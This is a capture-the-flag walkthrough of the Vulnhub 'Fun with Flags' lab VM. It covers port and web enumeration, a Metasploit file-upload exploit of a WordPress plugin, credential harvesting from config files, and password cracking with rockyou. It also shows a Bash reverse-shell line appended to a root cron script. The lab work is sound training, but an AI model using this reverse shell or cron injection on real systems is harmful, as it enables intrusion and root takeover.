TBBT: Fun with Flags — Walkthrough
Published in
17 min readMar 14, 2020
Description from Vulnhub
Welcome to "Fun with Flags"!
This boot2root machine is themed after the famous TV show, The Big Bang Theory. To successfully complete the challenge you will need to get all 7 flags, one for each main character and get root access.
Difficulty: Easy / Beginner Level
Need hints? Twiter @emaragkos
-Runs better with VirtualBox -DHCP is disabled - Static IP 192.168.1.105 -If you have problems setting a lab with a specific subnet 192.168.1.0/24
Tutorial: https://emaragkos.gr/tutorials/vulnhub-vm-with-static-ip/
Good luck and have fun :)
Download link: https://www.vulnhub.com/entry/tbbt-funwithflags,437/
Port Scanning
First things first, I did an extensive port scan with all ports, version / OS enumeration which gave me the following result.
t0thkr1s@kali ~> sudo nmap -A -Pn -p- 192.168.1.105
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-13 11:24 CDT
Nmap scan report for 192.168.1.105
Host is up (0.00084s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 ftp ftp 539 Mar 04 00:11 Welcome.txt
| -rw-r--r-- 1 ftp ftp 114 Mar 04 00:13 ftp_agreement.txt
|_drwxr-xr-x 9 ftp ftp 4096 Mar 04 00:09 pub
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.1.67
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 2
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 cf:5c:ee:76:7c:48:52:06:8d:56:07:7f:f6:5d:80:f2 (RSA)
| 256 ab:bb:fa:f9:89:99:02:9e:e4:20:fa:37:4f:6f:ca:ca (ECDSA)
|_ 256 ea:6d:77:f3:ff:9c:d5:dd:85:e3:1e:75:3c:7b:66:47 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 4 disallowed entries
|_/howard /web_shell.php /backdoor /rootflag.txt
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Fun with flags!
1337/tcp open waste?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NULL, NotesRPC, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns:
|_ FLAG-sheldon{cf88b37e8cb10c4005c1f2781a069cf8}
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port1337-TCP:V=7.80%I=7%D=3/13%Time=5E6BB3B4%P=x86_64-pc-linux-gnu%r(NU
SF:LL,2F,"FLAG-sheldon{cf88b37e8cb10c4005c1f2781a069cf8}\n")%r(GenericLine
SF:s,2F,"FLAG-sheldon{cf88b37e8cb10c4005c1f2781a069cf8}\n")%r(GetRequest,2
....As you can see, we already have a low hanging fruit which is out first flag. Let’s connect to port 1337 using ncat and gather Sheldon's flag.
t0thkr1s@kali ~> ncat 192.168.1.105 1337
FLAG-sheldon{cf88b37e8cb10c4005c1f2781a069cf8}FLAG-sheldon{cf88b37e8cb10c4005c1f2781a069cf8}
Directory Fuzzing
I fired up a quick dirb scan which turned out to be pretty helpful. In the meantime, I checked the robots.txt file which didn't yield anything useful.
t0thkr1s@kali ~> dirb http://192.168.1.105-----------------
DIRB v2.22
By The Dark Raver
-----------------START_TIME: Fri Mar 13 14:52:23 2020
URL_BASE: http://192.168.1.105/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt-----------------GENERATED WORDS: 4612---- Scanning URL: http://192.168.1.105/ ----
+ http://192.168.1.105/index.html (CODE:200|SIZE:239)
==> DIRECTORY: http://192.168.1.105/javascript/
==> DIRECTORY: http://192.168.1.105/music/
==> DIRECTORY: http://192.168.1.105/phpmyadmin/
==> DIRECTORY: http://192.168.1.105/private/
+ http://192.168.1.105/robots.txt (CODE:200|SIZE:112)
+ http://192.168.1.105/server-status (CODE:403|SIZE:301)
---- Entering directory: http://192.168.1.105/javascript/ ----
==> DIRECTORY: http://192.168.1.105/javascript/jquery/
---- Entering directory: http://192.168.1.105/music/ ----
+ http://192.168.1.105/music/index.html (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.1.105/music/wordpress/
---- Entering directory: http://192.168.1.105/phpmyadmin/ ----
==> DIRECTORY: http://192.168.1.105/phpmyadmin/doc/
+ http://192.168.1.105/phpmyadmin/favicon.ico (CODE:200|SIZE:22486)
+ http://192.168.1.105/phpmyadmin/index.php (CODE:200|SIZE:10344)
==> DIRECTORY: http://192.168.1.105/phpmyadmin/js/
+ http://192.168.1.105/phpmyadmin/libraries (CODE:403|SIZE:308)
==> DIRECTORY: http://192.168.1.105/phpmyadmin/locale/
+ http://192.168.1.105/phpmyadmin/phpinfo.php (CODE:200|SIZE:10346)
+ http://192.168.1.105/phpmyadmin/setup (CODE:401|SIZE:460)
==> DIRECTORY: http://192.168.1.105/phpmyadmin/sql/
==> DIRECTORY: http://192.168.1.105/phpmyadmin/templates/
==> DIRECTORY: http://192.168.1.105/phpmyadmin/themes/
---- Entering directory: http://192.168.1.105/private/ ----
==> DIRECTORY: http://192.168.1.105/private/css/
+ http://192.168.1.105/private/index.php (CODE:200|SIZE:685)
---- Entering directory: http://192.168.1.105/javascript/jquery/ ----
+ http://192.168.1.105/javascript/jquery/jquery (CODE:200|SIZE:284394)
---- Entering directory: http://192.168.1.105/music/wordpress/ ----
+ http://192.168.1.105/music/wordpress/index.php (CODE:301|SIZE:0)
==> DIRECTORY: http://192.168.1.105/music/wordpress/wp-admin/
==> DIRECTORY: http://192.168.1.105/music/wordpress/wp-content/
==> DIRECTORY: http://192.168.1.105/music/wordpress/wp-includes/
+ http://192.168.1.105/music/wordpress/xmlrpc.php (CODE:405|SIZE:42)
---- Entering directory: http://192.168.1.105/phpmyadmin/doc/ ----
==> DIRECTORY: http://192.168.1.105/phpmyadmin/doc/html/
---- Entering directory: http://192.168.1.105/phpmyadmin/js/ ----
==> DIRECTORY: http://192.168.1.105/phpmyadmin/js/jquery/
==> DIRECTORY: http://192.168.1.105/phpmyadmin/js/transformations/
....
The /private private directory has a nice website full of SQL Injections and also a Wordpress website popped up under the /music directory. Let's investigate further!
Wordpress Enumeration
When it comes to Wordpress, hands down my favorite tools is wpscan . After a couple of minutes, I got some juicy information.
t0thkr1s@kali ~> wpscan --url http://192.168.1.105/music/wordpress/ -e
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|WordPress Security Scanner by the WPScan Team
Version 3.7.9
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________[+] URL: http://192.168.1.105/music/wordpress/ [192.168.1.105]
[+] Started: Fri Mar 13 11:36:49 2020Interesting Finding(s):[+] Headers
| Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%[+] XML-RPC seems to be enabled: http://192.168.1.105/music/wordpress/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access[+] http://192.168.1.105/music/wordpress/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%[+] Registration is enabled: http://192.168.1.105/music/wordpress/wp-login.php?action=register
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%[+] Upload directory has listing enabled: http://192.168.1.105/music/wordpress/wp-content/uploads/
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%[+] http://192.168.1.105/music/wordpress/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299[+] WordPress version 5.3.2 identified (Latest, released on 2019-12-18).
| Found By: Rss Generator (Passive Detection)
| - http://192.168.1.105/music/wordpress/index.php/feed/, <generator>https://wordpress.org/?v=5.3.2</generator>
| - http://192.168.1.105/music/wordpress/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.3.2</generator>[+] WordPress theme in use: twentytwenty
| Location: http://192.168.1.105/music/wordpress/wp-content/themes/twentytwenty/
| Latest Version: 1.1 (up to date)
| Last Updated: 2020-02-25T00:00:00.000Z
| Readme: http://192.168.1.105/music/wordpress/wp-content/themes/twentytwenty/readme.txt
| Style URL: http://192.168.1.105/music/wordpress/wp-content/themes/twentytwenty/style.css?ver=1.1
| Style Name: Twenty Twenty
| Style URI: https://wordpress.org/themes/twentytwenty/
| Description: Our default theme for 2020 is designed to take full advantage of the flexibility of the block editor...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.1 (80% confidence)
| Found By: Style (Passive Detection)
| - http://192.168.1.105/music/wordpress/wp-content/themes/twentytwenty/style.css?ver=1.1, Match: 'Version: 1.1'[+] Enumerating Vulnerable Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)[i] Plugin(s) Identified:[+] reflex-gallery
| Location: http://192.168.1.105/music/wordpress/wp-content/plugins/reflex-gallery/
| Last Updated: 2019-05-10T16:05:00.000Z
| [!] The version is out of date, the latest version is 3.1.7
|
| Found By: Urls In Homepage (Passive Detection)
|
| [!] 2 vulnerabilities identified:
|
| [!] Title: Reflex Gallery <= 3.1.3 - Arbitrary File Upload
| Fixed in: 3.1.4
| References:
| - https://wpvulndb.com/vulnerabilities/7867
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4133
| - https://www.exploit-db.com/exploits/36374/
| - https://packetstormsecurity.com/files/130845/
| - https://packetstormsecurity.com/files/131515/
| - https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_reflexgallery_file_upload
|
| [!] Title: Multiple Plugins - jQuery prettyPhoto DOM Cross-Site Scripting (XSS)
| Fixed in: 3.1.5
| References:
| - https://wpvulndb.com/vulnerabilities/7985
| - https://blog.anantshri.info/forgotten_disclosure_dom_xss_prettyphoto
| - https://github.com/scaron/prettyphoto/issues/149
| - https://github.com/wpscanteam/wpscan/issues/818
|
| Version: 3.1.3 (80% confidence)
| Found By: Readme - Stable Tag (Aggressive Detection)
| - http://192.168.1.105/music/wordpress/wp-content/plugins/reflex-gallery/readme.txt[+] Enumerating Vulnerable Themes (via Passive and Aggressive Methods)
Checking Known Locations - Time: 00:00:00 <=======================================> (325 / 325) 100.00% Time: 00:00:00
[+] Checking Theme Versions (via Passive and Aggressive Methods)[i] No themes Found.[+] Enumerating Timthumbs (via Passive and Aggressive Methods)
Checking Known Locations - Time: 00:00:05 <=====================================> (2575 / 2575) 100.00% Time: 00:00:05[i] No Timthumbs Found.[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <==========================================> (21 / 21) 100.00% Time: 00:00:00[i] No Config Backups Found.[+] Enumerating DB Exports (via Passive and Aggressive Methods)
Checking DB Exports - Time: 00:00:00 <==============================================> (36 / 36) 100.00% Time: 00:00:00[i] No DB Exports Found.[+] Enumerating Medias (via Passive and Aggressive Methods) (Permalink setting must be set to "Plain" for those to be detected)
Brute Forcing Attachment IDs - Time: 00:00:01 <===================================> (100 / 100) 100.00% Time: 00:00:01[i] No Medias Found.[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <=========================================> (10 / 10) 100.00% Time: 00:00:00[i] User(s) Identified:[+] footprintsonthemoon
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Wp Json Api (Aggressive Detection)
| - http://192.168.1.105/music/wordpress/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)[+] stuart
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)[+] kripke
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)[+] WPVulnDB API OK
| Plan: free
| Requests Done (during the scan): 3
| Requests Remaining: 47[+] Finished: Fri Mar 13 11:37:04 2020
[+] Requests Done: 3089
[+] Cached Requests: 38
[+] Data Sent: 871.978 KB
[+] Data Received: 611.919 KB
[+] Memory used: 235.43 MB
[+] Elapsed time: 00:00:14
The tool identified 3 users, but that’s not interesting in this case. I focused on the Reflex Gallery plugin that is vulnerable to arbitrary file upload. I had the pleasure to exploit this vulnerability before and I knew there was a handy Metasploit module for it. I encourage you to exploit it manually, I was too lazy…
t0thkr1s@kali ~> msfconsole -q
[-] ***
[-] * WARNING: No database support: No database YAML file
[-] ***msf5 >
msf5 > search reflexMatching Modules
================# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/webapp/wp_reflexgallery_file_upload 2012-12-30 excellent Yes Wordpress Reflex Gallery Upload Vulnerabilitymsf5 > use exploit/unix/webapp/wp_reflexgallery_file_upload
msf5 exploit(unix/webapp/wp_reflexgallery_file_upload) > optionsModule options (exploit/unix/webapp/wp_reflexgallery_file_upload):Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to the wordpress application
VHOST no HTTP server virtual hostExploit target:Id Name
-- ----
0 Reflex Gallery 3.1.3msf5 exploit(unix/webapp/wp_reflexgallery_file_upload) > set rhosts 192.168.1.105
rhosts => 192.168.1.105
msf5 exploit(unix/webapp/wp_reflexgallery_file_upload) > set targeturi /music/wordpress
targeturi => /music/wordpress
msf5 exploit(unix/webapp/wp_reflexgallery_file_upload) > optionsModule options (exploit/unix/webapp/wp_reflexgallery_file_upload):Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.1.105 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /music/wordpress yes The base path to the wordpress application
VHOST no HTTP server virtual hostExploit target:Id Name
-- ----
0 Reflex Gallery 3.1.3msf5 exploit(unix/webapp/wp_reflexgallery_file_upload) > exploit[*] Started reverse TCP handler on 192.168.1.67:4444
[+] Our payload is at: YFnNenxtIkRaeh.php. Calling payload...
[*] Calling payload...
[*] Sending stage (38288 bytes) to 192.168.1.105
[*] Meterpreter session 1 opened (192.168.1.67:4444 -> 192.168.1.105:50508) at 2020-03-13 11:39:20 -0500
[+] Deleted YFnNenxtIkRaeh.phpmeterpreter >
meterpreter > getuid
Server username: www-data (33)
It’s enumeration time! I went to the home directory right away and started poking around. I found my second flag in penny’s home directory which was base64 encoded.
meterpreter > ls
Listing: /home/penny
====================Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100664/rw-rw-r-- 61 fil 2020-03-04 16:26:42 -0600 .FLAG.penny.txt
100600/rw------- 57 fil 2020-03-05 16:47:49 -0600 .bash_history
100644/rw-r--r-- 220 fil 2015-08-31 18:26:22 -0500 .bash_logout
100644/rw-r--r-- 3771 fil 2015-08-31 18:26:22 -0500 .bashrc
40700/rwx------ 4096 dir 2020-03-05 16:37:36 -0600 .cache
40775/rwxrwxr-x 4096 dir 2020-03-04 16:26:31 -0600 .nano
100644/rw-r--r-- 655 fil 2017-05-16 07:48:06 -0500 .profilemeterpreter > cat .FLAG.penny.txt
RkxBRy1wZW5ueXtkYWNlNTJiZGIyYTBiM2Y4OTlkZmIzNDIzYTk5MmIyNX0=
FLAG-penny{dace52bdb2a0b3f899dfb3423a992b25}
In amy’s home directory, there was a note and a strange file. I downloaded it to my machine to analyze it.
meterpreter > ls
Listing: /home/amy
==================Mode Size Type Last modified Name
---- ---- ---- ------------- ----
100600/rw------- 166 fil 2020-03-05 16:47:49 -0600 .bash_history
100644/rw-r--r-- 220 fil 2015-08-31 18:26:22 -0500 .bash_logout
100644/rw-r--r-- 3771 fil 2015-08-31 18:26:22 -0500 .bashrc
40700/rwx------ 4096 dir 2020-03-03 18:18:15 -0600 .cache
40775/rwxrwxr-x 4096 dir 2020-03-03 17:34:44 -0600 .nano
100644/rw-r--r-- 655 fil 2017-05-16 07:48:06 -0500 .profile
100777/rwxrwxrwx 434 fil 2020-03-04 08:30:02 -0600 notes.txt
100755/rwxr-xr-x 7488 fil 2020-03-05 16:06:57 -0600 secretdiarymeterpreter > cat notes.txt
This is my secret diary.
The safest way to keep my secrets is inside a compiled executable program.
As soon as I get popular now, that I have friends, I will start adding my secrets here.
I have used a really strong password that it cant be bruteforced.
Seriously it is 18 digit, alphanumeric, uppercase/lowercase with symbols.
And since my program is already compiled, no one can read the source code in order to view the password!meterpreter > download secretdiary
[*] Downloading: secretdiary -> secretdiary
[*] Downloaded 7.31 KiB of 7.31 KiB (100.0%): secretdiary -> secretdiary
[*] download : secretdiary -> secretdiary
I ran strings on the binary which not only revealed the password but amy's flag.
t0thkr1s@kali ~> strings secretdiary
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
__isoc99_scanf
puts
__stack_chk_fail
strcmp
__libc_start_main
__gmon_start__
GLIBC_2.7
GLIBC_2.4
GLIBC_2.0
PTRh`
UWVS
t$,U
[^_]
Enter your username:
Enter your password:
P@SSw0rd123Sh3ld0n
Login Success!
Soon I will be adding my secrets here..
FLAG-amy{60263777358690b90e8dbe8fea6943c9}
Wrong password! YOY WILL NEVER READ MY SECRETS
User doesn't exist
;*2$"(
GCC: (Ubuntu 5.4.0-6ubuntu1~16.04.12) 5.4.0 20160609
crtstuff.c
__JCR_LIST__
deregister_tm_clones
__do_global_dtors_aux
completed.7209
....FLAG-amy{60263777358690b90e8dbe8fea6943c9}
Privilege Escalation
Leaonard’s directory contained a shell script with some comments in it. After I read it through, I found out that this my privilege escalation vector to gain root privileges. The script is owned by root and it gets executed in every minute. I just had to append a Bash reverse shell line to it.
www-data@tbbt:/home/leonard$ ls -la
total 24
drwxr-xr-x 2 leonard leonard 4096 Mar 6 00:47 .
drwxr-xr-x 10 root root 4096 Mar 4 02:33 ..
-rw------- 1 leonard leonard 0 Mar 6 00:47 .bash_history
-rw-r--r-- 1 leonard leonard 220 Sep 1 2015 .bash_logout
-rw-r--r-- 1 leonard leonard 3771 Sep 1 2015 .bashrc
-rw-r--r-- 1 leonard leonard 655 May 16 2017 .profile
-rwxrwxrwx 1 root root 484 Mar 6 00:23 thermostat_set_temp.sh
www-data@tbbt:/home/leonard$ cat thermostat_set_temp.sh
#!/bin/bash
# This script is empty for now, I will code it as soon as I have free time.
# This script will secretly connect to our IoT thermostat and always set the
# temperature in the value I wish overiding Sheldons' settings without him even knowing.
# Even if Sheldon changes the value my script is already configured to run every minute
# and change the value again and again!
# I am so smart
# Now I just have to code it...# MAKE API CALL TO THERMOSTAT TO SET TEMP_VALUE=22www-data@tbbt:/home/leonard$ echo "bash -i >& /dev/tcp/192.168.1.67/9999 0>&1" >> thermostat_set_temp.sh
www-data@tbbt:/home/leonard$ cat thermostat_set_temp.sh
#!/bin/bash
# This script is empty for now, I will code it as soon as I have free time.
# This script will secretly connect to our IoT thermostat and always set the
# temperature in the value I wish overiding Sheldons' settings without him even knowing.
# Even if Sheldon changes the value my script is already configured to run every minute
# and change the value again and again!
# I am so smart
# Now I just have to code it...# MAKE API CALL TO THERMOSTAT TO SET TEMP_VALUE=22bash -i >& /dev/tcp/192.168.1.67/9999 0>&1
I didn’t have to wait much to get my connection back with root privileges. However this was not the end of the journey. There were flags out there that I missed.
t0thkr1s@kali ~> ncat -lvp 9999
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::9999
Ncat: Listening on 0.0.0.0:9999
Ncat: Connection from 192.168.1.105.
Ncat: Connection from 192.168.1.105:37632.
bash: cannot set terminal process group (2096): Inappropriate ioctl for device
bash: no job control in this shell
root@tbbt:~# id
uid=0(root) gid=0(root) groups=0(root)
root@tbbt:~# cd /root
cd /root
root@tbbt:~# ls
FLAG-leonard.txt
root@tbbt:~# cat FLAG-leonard.txt
cat FLAG-leonard.txt
____
/ \
/______\
||
/~~~~~~~~\ || /~~~~~~~~~~~~~~~~\
/~ () () ~\ || /~ () () () () ~\
(_)========(_) || (_)==== ===========(_)
I|_________|I _||_ |___________________|
.////////////////////////////\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\Gongrats!
You have rooted the box! Now you can sit on Sheldons spot!
FLAG-leonard{17fc95224b65286941c54747704acd3e}I hope you liked it!
root@tbbt:~#
FLAG-leonard{17fc95224b65286941c54747704acd3e}
I checked the locally listenning ports and confirmed that the mysql server (port 3306) is up and running.
root@tbbt:~# netstat -an
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 0.0.0.0:22 0.0.0.0:*
tcp 0 0 0.0.0.0:1337 0.0.0.0:*
tcp 0 0 127.0.0.1:3306 0.0.0.0:*
tcp 0 0 192.168.1.105:38046 192.168.1.67:9999
tcp 1 0 192.168.1.105:37740 192.168.1.67:9999 I went into the /var/www/html/private/ directory and found a db_config.php with database credentials. I used Python to spawn a pseudo TTY shell and logged in to the database. I listed out all the users and found another flag.
root@tbbt:/var/www/html/private# ls
css
db_config.php
index.php
login.php
searchproducts.php
root@tbbt:/var/www/html/private# cat db_config.php
<?php
// Create connection
$DBUSER = 'bigpharmacorp';
$DBPASS = 'weareevil';$con=mysqli_connect("127.0.0.1",$DBUSER,$DBPASS,"bigpharmacorp");// Check connection
if (mysqli_connect_errno($con))
{
echo "<font style=\"color:#FF0000\">Could not connect:". mysqli_connect_error()."</font\>";
}
?>
root@tbbt:/var/www/html/private# python -c 'import pty; pty.spawn("/bin/bash")'
root@tbbt:/var/www/html/private# mysql -u bigpharmacorp -p
Enter password: weareevilWelcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 158
Server version: 5.7.25-0ubuntu0.16.04.2 (Ubuntu)Copyright (c) 2000, 2019, Oracle and/or its affiliates. All rights reserved.Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.mysql> show databases;
show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| bigpharmacorp |
+--------------------+
2 rows in set (0.00 sec)mysql> use bigpharmacorp;
use bigpharmacorp;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -ADatabase changed
mysql> show tables;
show tables;
+-------------------------+
| Tables_in_bigpharmacorp |
+-------------------------+
| products |
| users |
+-------------------------+
2 rows in set (0.00 sec)mysql> select * from users;
select * from users;
+----+------------+----------------------------------+------------+---------------------------------------------------+
| id | username | password | fname | description |
+----+------------+----------------------------------+------------+---------------------------------------------------+
| 1 | admin | 3fc0a7acf087f549ac2b266baf94b8b1 | josh | Dont mess with me |
| 2 | bobby | 8cb1fb4a98b9c43b7ef208d624718778 | bob | I like playing football. |
| 3 | penny69 | cafa13076bb64e7f8bd480060f6b2332 | penny | Hi I am Penny I am new here!! <3 |
| 4 | mitsos1981 | 05d51709b81b7e0f1a9b6b4b8273b217 | dimitris | Opa re malaka! |
| 5 | alicelove | e146ec4ce165061919f887b70f49bf4b | alice | Eat Pray Love |
| 6 | bernadette | dc5ab2b32d9d78045215922409541ed7 | bernadette | FLAG-bernadette{f42d950ab0e966198b66a5c719832d5f} |
+----+------------+----------------------------------+------------+---------------------------------------------------+
6 rows in set (0.00 sec)mysql>
FLAG-bernadette{f42d950ab0e966198b66a5c719832d5f}
Back to FTP
I was distracted with all the findings and missed the obvious opportunity with the anonymous FTP login. I’m here to correct that mistake. I found a note and a compressed ZIP file in howard’s public directory which was password protected.
t0thkr1s@kali ~> ftp 192.168.1.105
Connected to 192.168.1.105.
220 (vsFTPd 3.0.3)
Name (192.168.1.105:t0thkr1s): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 ftp ftp 539 Mar 04 00:11 Welcome.txt
-rw-r--r-- 1 ftp ftp 114 Mar 04 00:13 ftp_agreement.txt
drwxr-xr-x 9 ftp ftp 4096 Mar 04 00:09 pub
226 Directory send OK.
ftp> cd pub
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 ftp ftp 4096 Mar 03 23:57 amy
drwxr-xr-x 2 ftp ftp 4096 Mar 04 00:40 bernadette
drwxr-xr-x 2 ftp ftp 4096 Mar 06 02:32 howard
drwxr-xr-x 2 ftp ftp 4096 Mar 03 23:57 leonard
drwxr-xr-x 2 ftp ftp 4096 Mar 05 00:25 penny
drwxr-xr-x 2 ftp ftp 4096 Mar 03 23:57 raj
-rw-r--r-- 1 ftp ftp 297410 Mar 04 00:09 roomate_agreement.jpg
-rw-r--r-- 1 ftp ftp 3348 Mar 04 00:08 roomate_agreement.txt
drwxr-xr-x 2 ftp ftp 4096 Mar 04 19:38 sheldon
226 Directory send OK.
ftp> cd howard
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 ftp ftp 273 Mar 04 00:05 note.txt
-rw-r--r-- 1 ftp ftp 30762 Mar 06 02:29 super_secret_nasa_stuff_here.zip
226 Directory send OK.
ftp> get note.txt
local: note.txt remote: note.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note.txt (273 bytes).
226 Transfer complete.
273 bytes received in 0.00 secs (868.4090 kB/s)
ftp> get super_secret_nasa_stuff_here.zip
local: super_secret_nasa_stuff_here.zip remote: super_secret_nasa_stuff_here.zip
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for super_secret_nasa_stuff_here.zip (30762 bytes).
226 Transfer complete.
30762 bytes received in 0.00 secs (58.2082 MB/s)
ftp> exit
221 Goodbye.So, I decided to crack it with fcrackzip and rockyou.txt . I quickly got the password and extracted the JPG file. It seemed to me it's a dead end but the creator of the machine gave me confidence that I'm in the right direction. I used stegcracker to brute-force the password and get howard's flag.
t0thkr1s@kali ~> fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt super_secret_nasa_stuff_here.zipPASSWORD FOUND!!!!: pw == astronaut
t0thkr1s@kali ~> unzip super_secret_nasa_stuff_here.zip
Archive: super_secret_nasa_stuff_here.zip
[super_secret_nasa_stuff_here.zip] marsroversketch.jpg password:
replace marsroversketch.jpg? [y]es, [n]o, [A]ll, [N]one, [r]ename: y
inflating: marsroversketch.jpg
t0thkr1s@kali ~> stegcracker marsroversketch.jpg /usr/share/wordlists/rockyou.txt
StegCracker 2.0.7 - (https://github.com/Paradoxis/StegCracker)
Copyright (c) 2020 - Luke Paris (Paradoxis)Counting lines in wordlist..
Attacking file 'marsroversketch.jpg' with wordlist '/usr/share/wordlists/rockyou.txt'..
Successfully cracked file with password: iloveyoumom
Tried 51221 passwords
Your file has been written to: marsroversketch.jpg.out
iloveyoumom
t0thkr1s@kali ~> file marsroversketch.jpg.out
marsroversketch.jpg.out: ASCII text
t0thkr1s@kali ~> cat marsroversketch.jpg.out
FLAG-howard{b3d1baf22e07874bf744ad7947519bf4}
t0thkr1s@kali ~>
FLAG-howard{b3d1baf22e07874bf744ad7947519bf4}
Wordpress Database
At this point, only one flag left. I went back to the Wordpress site directory to see the database credentials in the wp-config.php file.
root@tbbt:/var/www/html/music/wordpress# cat wp-config.php
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://codex.wordpress.org/Editing_wp-config.php
*
* @package WordPress
*/// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'footprintsonthemoon' );/** MySQL database username */
define( 'DB_USER', 'footprintsonthemoon' );/** MySQL database password */
define( 'DB_PASSWORD', 'footprintsonthemoon1337' );/** MySQL hostname */
define( 'DB_HOST', 'localhost' );/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
...
I logged in with the above credentials and started looking around in th database. The wp_users table was not particularly interesting. However, I found the flag in the wp_posts table. You can see it at the end of the output.
root@tbbt:~# mysql -u footprintsonthemoon -p
Enter password: footprintsonthemoon1337Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 65066
